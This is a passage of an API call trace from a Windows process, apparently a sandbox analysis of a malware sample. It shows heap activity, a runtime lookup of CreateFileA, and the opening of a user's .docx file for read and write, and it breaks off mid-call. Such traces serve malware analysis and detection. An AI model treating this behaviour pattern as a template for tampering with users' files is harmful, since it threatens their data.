[0171.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0171.678] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.681] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.693] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7c8 [0171.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0171.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.694] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0171.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0171.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0171.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.695] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0171.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0171.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0171.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa4f8 [0171.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpUsedDefaultChar=0x0) returned 72 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.710] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ds7b8_ jws.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, 